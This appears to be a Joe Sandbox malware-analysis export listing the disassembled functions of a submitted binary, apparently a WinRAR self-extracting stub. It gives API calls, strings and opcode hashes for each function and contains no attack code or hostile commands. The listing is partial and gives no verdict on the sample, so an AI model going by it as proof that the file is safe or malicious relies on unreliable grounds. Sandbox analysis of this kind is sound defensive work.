                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F9982D
                                          Strings
                                          Similarity
                                          • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                          • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                          • API String ID: 1777411235-4209811716
                                          • Opcode ID: ef1c9ed8329b98b3e5a4d098c1b943759b477a8c8f899234feba5a91535514ee
                                          • Instruction ID: bd0767543499244e2984701e8a80bd8d9c07abe6ca7f0605bd190e437f50145f
                                          • Opcode Fuzzy Hash: ef1c9ed8329b98b3e5a4d098c1b943759b477a8c8f899234feba5a91535514ee
                                          • Instruction Fuzzy Hash: 0D314C7250C3017AFB25AF699C46F9B779C9F53320F15011DF401961C2EBA8EA08A7A6
                                          APIs
                                          • GetWindow.USER32(?,00000005), ref: 00F9D6C1
                                          • GetClassNameW.USER32(00000000,?,00000800), ref: 00F9D6ED
                                            • Part of subcall function 00F91FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00F8C116,00000000,.exe,?,?,00000800,?,?,?,00F98E3C), ref: 00F91FD1
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00F9D709
                                          • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00F9D720
                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00F9D734
                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00F9D75D
                                          • DeleteObject.GDI32(00000000), ref: 00F9D764
                                          • GetWindow.USER32(00000000,00000002), ref: 00F9D76D
                                          Strings
                                          Similarity
                                          • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                          • String ID: STATIC
                                          • API String ID: 3820355801-1882779555
                                          • Opcode ID: e62fc998c50b8b65889e6c56f805c8f3f8300ea315273df400a96fa9ccfd94c7
                                          • Instruction ID: 849da92217bb0cd9503d9a5bd3f5d1d48cfba5f5e693a99b513715ebbf556e84
                                          • Opcode Fuzzy Hash: e62fc998c50b8b65889e6c56f805c8f3f8300ea315273df400a96fa9ccfd94c7
                                          • Instruction Fuzzy Hash: 0D113632A403547BFE216BB09C8EFAF7A5CAF40761F114120FA41AB0D1DA78CE0576B2
                                          APIs
                                          • _free.LIBCMT ref: 00FA9705
                                            • Part of subcall function 00FA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34), ref: 00FA8DE2
                                            • Part of subcall function 00FA8DCC: GetLastError.KERNEL32(00FB3A34,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34,00FB3A34), ref: 00FA8DF4
                                          • _free.LIBCMT ref: 00FA9711
                                          • _free.LIBCMT ref: 00FA971C
                                          • _free.LIBCMT ref: 00FA9727
                                          • _free.LIBCMT ref: 00FA9732
                                          • _free.LIBCMT ref: 00FA973D
                                          • _free.LIBCMT ref: 00FA9748
                                          • _free.LIBCMT ref: 00FA9753
                                          • _free.LIBCMT ref: 00FA975E
                                          • _free.LIBCMT ref: 00FA976C
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 985fef10e6ef359aa7fb1ca3d63f6c59c5553a2ec6a1b4568d6ac0b77813f48b
                                          • Instruction ID: ff976bd3a589448d3530ba6cfa52fe740135a53bd2d3c9317deeaee722473b81
                                          • Opcode Fuzzy Hash: 985fef10e6ef359aa7fb1ca3d63f6c59c5553a2ec6a1b4568d6ac0b77813f48b
                                          • Instruction Fuzzy Hash: 9611A4B6510109AFCB01EF64CC42CD93BB5EF15390B5154A1FA088F262DEB6DA52AB84
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                          • String ID: csm$csm$csm
                                          • API String ID: 322700389-393685449
                                          • Opcode ID: 93c86d1fe4cfb6a9a5e31298775832529bfede5ecd7ed842cb79365cd23d9e1c
                                          • Instruction ID: 53dcd8c0bcb6573d0d379516e026e993c159cacfc4704332a2329fa7fb4d081c
                                          • Opcode Fuzzy Hash: 93c86d1fe4cfb6a9a5e31298775832529bfede5ecd7ed842cb79365cd23d9e1c
                                          • Instruction Fuzzy Hash: E1B16CB1E00219EFCF25DFA8C8819AEB7B5FF06320F14415AF8156B212D739DA51EB91
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F86FAA
                                          • _wcslen.LIBCMT ref: 00F87013
                                          • _wcslen.LIBCMT ref: 00F87084
                                            • Part of subcall function 00F87A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F87AAB
                                            • Part of subcall function 00F87A9C: GetLastError.KERNEL32 ref: 00F87AF1
                                            • Part of subcall function 00F87A9C: CloseHandle.KERNEL32(?), ref: 00F87B00
                                          Strings
                                          Similarity
                                          • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                          • API String ID: 3122303884-3508440684
                                          • Opcode ID: 152f4b20fbd93ee0399ff5e912b83616cffb8864aee312607e965095d5728435
                                          • Instruction ID: 0e6efc94f799577c2573e5a59ad9c7d67693d55abcfd39628567d17e9ab10c44
                                          • Opcode Fuzzy Hash: 152f4b20fbd93ee0399ff5e912b83616cffb8864aee312607e965095d5728435
                                          • Instruction Fuzzy Hash: 8841F4B1D08744BAEB20F7709C86FEE776CAF05314F104455FA55A6182D778EA88AB22
                                          APIs
                                            • Part of subcall function 00F81316: GetDlgItem.USER32(00000000,00003021), ref: 00F8135A
                                            • Part of subcall function 00F81316: SetWindowTextW.USER32(00000000,00FB35F4), ref: 00F81370
                                          • EndDialog.USER32(?,00000001), ref: 00F9B610
                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00F9B637
                                          • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00F9B650
                                          • SetWindowTextW.USER32(?,?), ref: 00F9B661
                                          • GetDlgItem.USER32(?,00000065), ref: 00F9B66A
                                          • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00F9B67E
                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00F9B694
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$Item$TextWindow$Dialog
                                          • String ID: LICENSEDLG
                                          • API String ID: 3214253823-2177901306
                                          • Opcode ID: 08828c60de86c015718c9115bc839019445bf4393bfa382855fc0307a20f5519
                                          • Instruction ID: 31cb27cdd7f50ff9f1c32b1ac4c72ee057df66c67a624d6257657278b937557c
                                          • Opcode Fuzzy Hash: 08828c60de86c015718c9115bc839019445bf4393bfa382855fc0307a20f5519
                                          • Instruction Fuzzy Hash: 2621EA3260420CBBEA115F76FD8DF3B3B6DEB46755F010059F601970A0CB56AA05F631
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,A338C176,00000001,00000000,00000000,?,?,00F8AF6C,ROOT\CIMV2), ref: 00F9FD99
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00F8AF6C,ROOT\CIMV2), ref: 00F9FE14
                                          • SysAllocString.OLEAUT32(00000000), ref: 00F9FE1F
                                          • _com_issue_error.COMSUPP ref: 00F9FE48
                                          • _com_issue_error.COMSUPP ref: 00F9FE52
                                          • GetLastError.KERNEL32(80070057,A338C176,00000001,00000000,00000000,?,?,00F8AF6C,ROOT\CIMV2), ref: 00F9FE57
                                          • _com_issue_error.COMSUPP ref: 00F9FE6A
                                          • GetLastError.KERNEL32(00000000,?,?,00F8AF6C,ROOT\CIMV2), ref: 00F9FE80
                                          • _com_issue_error.COMSUPP ref: 00F9FE93
                                          Similarity
                                          • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                          • String ID:
                                          • API String ID: 1353541977-0
                                          • Opcode ID: 30a1990c4fe5e1b25b4f7845a825c72b74ad835f65703bd76519158eecf38e85
                                          • Instruction ID: 6f94c46123f9ee7e2952fb6144968491e3b0a5707bb03c7688913f93dc5f2749
                                          • Opcode Fuzzy Hash: 30a1990c4fe5e1b25b4f7845a825c72b74ad835f65703bd76519158eecf38e85
                                          • Instruction Fuzzy Hash: 5F41EEB1E00219ABEF10AF69CC45BAFB7A8EF44720F14423AF515D7251D7349904EBE5
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                          • API String ID: 3519838083-3505469590
                                          • Opcode ID: 06e430daad7e16ec787675f46fcab9917d6c4d20a039ba963b6596b4569a3d25
                                          • Instruction ID: b895b6b5fbc2f2ae6809a5dde8ae9729f7c63f517fdfd88e2410f13239817b3d
                                          • Opcode Fuzzy Hash: 06e430daad7e16ec787675f46fcab9917d6c4d20a039ba963b6596b4569a3d25
                                          • Instruction Fuzzy Hash: 76717D71A00219EFEF14EFA5CC959AEB7B8FF49310B00015DE512A72A0CB34AD01EF61
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F89387
                                          • GetLongPathNameW.KERNEL32 ref: 00F893AA
                                          • GetShortPathNameW.KERNEL32(?,?,00000800,?,00000001,?,00F88031,?,?,?,00000800,?,?,?,?,00000001), ref: 00F893C9
                                            • Part of subcall function 00F8C29A: _wcslen.LIBCMT ref: 00F8C2A2
                                            • Part of subcall function 00F91FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00F8C116,00000000,.exe,?,?,00000800,?,?,?,00F98E3C), ref: 00F91FD1
                                          • _swprintf.LIBCMT ref: 00F89465
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                          • MoveFileW.KERNEL32 ref: 00F894D4
                                          • MoveFileW.KERNEL32 ref: 00F89514
                                          Strings
                                          Similarity
                                          • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                          • String ID: rtmp%d
                                          • API String ID: 3726343395-3303766350
                                          • Opcode ID: 8a7d217450ee3c48b68300d4eb537bd8a26a3249be136b4c6f34d48492104486
                                          • Instruction ID: 52fb0080be7e22b1eca6e6e8382722b2d794fdda62b45cfd3063e142db64a9ac
                                          • Opcode Fuzzy Hash: 8a7d217450ee3c48b68300d4eb537bd8a26a3249be136b4c6f34d48492104486
                                          • Instruction Fuzzy Hash: 2F4147B190425965DF21FB60CC45EEE737CAF45340F0848A5B649E7051DB7C9B89AFA0
                                          APIs
                                          • __aulldiv.LIBCMT ref: 00F9122E
                                            • Part of subcall function 00F8B146: GetVersionExW.KERNEL32(?), ref: 00F8B16B
                                          • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00F91251
                                          • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00F91263
                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00F91274
                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F91284
                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F91294
                                          • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00F912CF
                                          • __aullrem.LIBCMT ref: 00F91379
                                          Similarity
                                          • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                          • String ID:
                                          • API String ID: 1247370737-0
                                          • Opcode ID: b566b9cff1d8511d68bd2065d9199876d57d5340cadc597a888c5d38ea123a51
                                          • Instruction ID: c381c2382c42a005e7699387eb4dda509e921f5b35d39159a29ff6bef7dd1080
                                          • Opcode Fuzzy Hash: b566b9cff1d8511d68bd2065d9199876d57d5340cadc597a888c5d38ea123a51
                                          • Instruction Fuzzy Hash: AE4108B19483069FD710DF65C88496BBBF9FF88314F008A2EF596C2210E739E549DB51
                                          APIs
                                          • _swprintf.LIBCMT ref: 00F82536
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                            • Part of subcall function 00F905DA: _wcslen.LIBCMT ref: 00F905E0
                                          Strings
                                          Similarity
                                          • API ID: __vswprintf_c_l_swprintf_wcslen
                                          • String ID: ;%u$x%u$xc%u
                                          • API String ID: 3053425827-2277559157
                                          • Opcode ID: 71b0bcb9ff104def7f56361543cd812288733130c1ab3f266d4595346f12cf06
                                          • Instruction ID: 64e2fc2093b3f7e47f069b2c8c73b78642f8758823aa0498bcea93ecf598dcc6
                                          • Opcode Fuzzy Hash: 71b0bcb9ff104def7f56361543cd812288733130c1ab3f266d4595346f12cf06
                                          • Instruction Fuzzy Hash: 6AF12771A043809BDF65FB248C95BFE77956F91300F08056DEC869B283CB78A945E7A2
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID: </p>$</style>$<br>$<style>$>
                                          • API String ID: 176396367-3568243669
                                          • Opcode ID: 78bcaefa6d23847c6f26575e768215858ea3d46e1bf9d9987797e6807042f7a2
                                          • Instruction ID: f9fab7e36f8d3873cc2ef1f75e27f09bd154d85f8c93b2617e0d9a0c34be96c1
                                          • Opcode Fuzzy Hash: 78bcaefa6d23847c6f26575e768215858ea3d46e1bf9d9987797e6807042f7a2
                                          • Instruction Fuzzy Hash: C851D456E4932295FF30AA1D985177673A1DFA1760F5A042FF9C18B2C0FBE58C81A261
                                          APIs
                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00FAFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00FAF6CF
                                          • __fassign.LIBCMT ref: 00FAF74A
                                          • __fassign.LIBCMT ref: 00FAF765
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00FAF78B
                                          • WriteFile.KERNEL32(?,00000000,00000000,00FAFE02,00000000,?,?,?,?,?,?,?,?,?,00FAFE02,00000000), ref: 00FAF7AA
                                          • WriteFile.KERNEL32(?,00000000,00000001,00FAFE02,00000000,?,?,?,?,?,?,?,?,?,00FAFE02,00000000), ref: 00FAF7E3
                                          Similarity
                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                          • String ID:
                                          • API String ID: 1324828854-0
                                          • Opcode ID: 0211a74d6608d7ce2e1877eeb803e017ef76043788c63a69e1e68466a6b69317
                                          • Instruction ID: ee9f0ee903439efbf845d40e268e674bd3d17b806d43a017fdaeb8a732bfebdf
                                          • Opcode Fuzzy Hash: 0211a74d6608d7ce2e1877eeb803e017ef76043788c63a69e1e68466a6b69317
                                          • Instruction Fuzzy Hash: 0651B6F1D002499FDB10CFA8DC85AEEBBF8EF09310F14416AE555EB251D774AA44DBA0
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 00FA2937
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00FA293F
                                          • _ValidateLocalCookies.LIBCMT ref: 00FA29C8
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00FA29F3
                                          • _ValidateLocalCookies.LIBCMT ref: 00FA2A48
                                          Strings
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 622e33a41e08bbea57515e3739c002c1ecd116d623726608a087a35757712fc3
                                          • Instruction ID: fc655f0c3ab9f2abdcf3e6e619999cb7a43b444e0fa8edebd77089772ae0f59e
                                          • Opcode Fuzzy Hash: 622e33a41e08bbea57515e3739c002c1ecd116d623726608a087a35757712fc3
                                          • Instruction Fuzzy Hash: 0241D174F00218AFCF10DF2CCC84A9EBBB1AF0A724F148155E814AB292C739DA05EF91
                                          APIs
                                          • ShowWindow.USER32(?,00000000), ref: 00F99EEE
                                          • GetWindowRect.USER32(?,00000000), ref: 00F99F44
                                          • ShowWindow.USER32(?,00000005,00000000), ref: 00F99FDB
                                          • SetWindowTextW.USER32(?,00000000), ref: 00F99FE3
                                          • ShowWindow.USER32(00000000,00000005), ref: 00F99FF9
                                          Strings
                                          Similarity
                                          • API ID: Window$Show$RectText
                                          • String ID: RarHtmlClassName
                                          • API String ID: 3937224194-1658105358
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                          • API String ID: 176396367-3743748572
                                          APIs
                                            • Part of subcall function 00FAC868: _free.LIBCMT ref: 00FAC891
                                          • _free.LIBCMT ref: 00FAC8F2
                                            • Part of subcall function 00FA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34), ref: 00FA8DE2
                                            • Part of subcall function 00FA8DCC: GetLastError.KERNEL32(00FB3A34,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34,00FB3A34), ref: 00FA8DF4
                                          • _free.LIBCMT ref: 00FAC8FD
                                          • _free.LIBCMT ref: 00FAC908
                                          • _free.LIBCMT ref: 00FAC95C
                                          • _free.LIBCMT ref: 00FAC967
                                          • _free.LIBCMT ref: 00FAC972
                                          • _free.LIBCMT ref: 00FAC97D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00F9E669,00F9E5CC,00F9E86D), ref: 00F9E605
                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00F9E61B
                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00F9E630
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                          • API String ID: 667068680-1718035505
                                          APIs
                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F914C2
                                            • Part of subcall function 00F8B146: GetVersionExW.KERNEL32(?), ref: 00F8B16B
                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F914E6
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F91500
                                          • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00F91513
                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F91523
                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F91533
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Time$File$System$Local$SpecificVersion
                                          • String ID:
                                          • API String ID: 2092733347-0
                                          APIs
                                          • GetLastError.KERNEL32(?,?,00FA2AF1,00FA02FC,00F9FA34), ref: 00FA2B08
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FA2B16
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FA2B2F
                                          • SetLastError.KERNEL32(00000000,00FA2AF1,00FA02FC,00F9FA34), ref: 00FA2B81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          APIs
                                          • GetLastError.KERNEL32(?,00FC1030,00FA4674,00FC1030,?,?,00FA3F73,00000050,?,00FC1030,00000200), ref: 00FA97E9
                                          • _free.LIBCMT ref: 00FA981C
                                          • _free.LIBCMT ref: 00FA9844
                                          • SetLastError.KERNEL32(00000000,?,00FC1030,00000200), ref: 00FA9851
                                          • SetLastError.KERNEL32(00000000,?,00FC1030,00000200), ref: 00FA985D
                                          • _abort.LIBCMT ref: 00FA9863
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free$_abort
                                          • String ID:
                                          • API String ID: 3160817290-0
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F9DC47
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F9DC61
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F9DC72
                                          • TranslateMessage.USER32(?), ref: 00F9DC7C
                                          • DispatchMessageW.USER32(?), ref: 00F9DC86
                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F9DC91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                          • String ID:
                                          • API String ID: 2148572870-0
                                          APIs
                                            • Part of subcall function 00F905DA: _wcslen.LIBCMT ref: 00F905E0
                                            • Part of subcall function 00F8B92D: _wcsrchr.LIBVCRUNTIME ref: 00F8B944
                                          • _wcslen.LIBCMT ref: 00F8C197
                                          • _wcslen.LIBCMT ref: 00F8C1DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _wcslen$_wcsrchr
                                          • String ID: .exe$.rar$.sfx
                                          • API String ID: 3513545583-31770016
                                          APIs
                                          • GetTempPathW.KERNEL32(00000800,?), ref: 00F9CE9D
                                            • Part of subcall function 00F8B690: _wcslen.LIBCMT ref: 00F8B696
                                          • _swprintf.LIBCMT ref: 00F9CED1
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                          • SetDlgItemTextW.USER32(?,00000066,00FC946A), ref: 00F9CEF1
                                          • EndDialog.USER32(?,00000001), ref: 00F9CFFE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                          • String ID: %s%s%u
                                          • API String ID: 110358324-1360425832
                                          APIs
                                          • _wcslen.LIBCMT ref: 00F8BB27
